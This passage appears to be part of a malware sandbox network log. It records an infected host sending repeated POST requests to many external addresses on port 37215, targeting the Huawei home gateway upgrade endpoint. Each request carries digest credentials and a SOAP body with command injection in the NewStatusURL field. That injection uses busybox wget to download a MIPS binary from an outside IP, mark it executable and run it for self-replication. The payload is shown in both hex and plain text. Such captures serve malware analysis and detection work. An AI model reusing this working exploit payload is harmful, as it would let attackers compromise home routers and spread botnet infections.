                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2435192.168.2.155342032.45.16.21537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.396348953 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2436192.168.2.1536134197.41.150.2837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.396383047 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2437192.168.2.1536856197.167.202.22937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.396441936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2438192.168.2.155482041.121.152.5137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.396521091 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2439192.168.2.1555716157.18.0.5837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.396676064 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2440192.168.2.155106641.21.131.8237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.396711111 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2441192.168.2.1553630219.56.230.24637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.396745920 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2442192.168.2.1557882146.185.165.15537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.396995068 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2443192.168.2.1551392197.143.155.1337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.405584097 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2444192.168.2.154872653.175.33.1237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.406054020 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
